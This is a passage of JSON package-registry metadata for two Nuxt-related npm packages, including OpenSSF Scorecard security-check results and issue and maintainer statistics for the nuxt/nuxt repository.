'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32304464,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-26T09:34:17.070Z","status":"ssl_error","status_checked_at":"2026-04-26T09:34:00.993Z","response_time":129,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-05-11T01:23:04.217Z","dependent_packages_count":0,"downloads":12,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":25.261949714304727,"dependent_packages_count":36.55051025924663,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":30.906229986775678},"purl":"pkg:npm/%40lgcardenas/nuxt","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@lgcardenas/nuxt","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@lgcardenas/nuxt","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@lgcardenas/nuxt/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-02-13T18:00:30.319Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786776.4495867769,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":588,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.496213224584911,"merged_pull_requests_count":5386,"bot_issues_count":12,"bot_pull_requests_count":2972,"past_year_issues_count":940,"past_year_pull_requests_count":1678,"past_year_avg_time_to_close_issue":711939.6998050682,"past_year_avg_time_to_close_pull_request":221172.79485238457,"past_year_issues_closed_count":513,"past_year_pull_requests_closed_count":1321,"past_year_pull_request_authors_count":141,"past_year_issue_authors_count":674,"past_year_avg_comments_per_issue":2.2457446808510637,"past_year_avg_comments_per_pull_request":3.4153754469606676,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":694,"past_year_merged_pull_requests_count":1175,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":321,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":66,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"BobbieGoede","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"cernymatej","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"DamianGlowala","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"wattanx","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"dargmuesli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@lgcardenas%2Fnuxt/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@lgcardenas%2Fnuxt/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@lgcardenas%2Fnuxt/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@lgcardenas%2Fnuxt/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@lgcardenas%2Fnuxt/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@lgcardenas%2Fnuxt/codemeta","maintainers":[{"uuid":"lgcardenas","login":"lgcardenas","name":null,"email":"lgcardenas910526@gmail.com","url":null,"packages_count":2,"html_url":"https://www.npmjs.com/~lgcardenas","role":null,"created_at":"2025-01-06T23:41:10.365Z","updated_at":"2025-01-06T23:41:10.365Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/lgcardenas/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096131,"name":"@nuxt/types-edge","ecosystem":"npm","description":"Nuxt types","homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":855,"first_release_published_at":"2020-05-28T19:39:21.915Z","latest_release_published_at":"2020-06-29T00:23:06.900Z","latest_release_number":"3.0.0-26556502.75dd90f2","last_synced_at":"2026-05-11T01:23:10.184Z","created_at":"2022-04-08T10:39:34.487Z","updated_at":"2026-05-11T01:23:10.184Z","registry_url":"https://www.npmjs.com/package/@nuxt/types-edge","install_command":"npm install @nuxt/types-edge","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"next":"3.0.0-26556502.75dd90f2","latest":"2.18.2-28661769.e265ef3"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-04-29T23:50:20.000Z","size":137431,"stargazers_count":60131,"open_issues_count":887,"forks_count":5588,"subscribers_count":774,"default_branch":"main","last_synced_at":"2026-04-30T01:14:24.889Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-04-30T00:02:56.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":321,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . 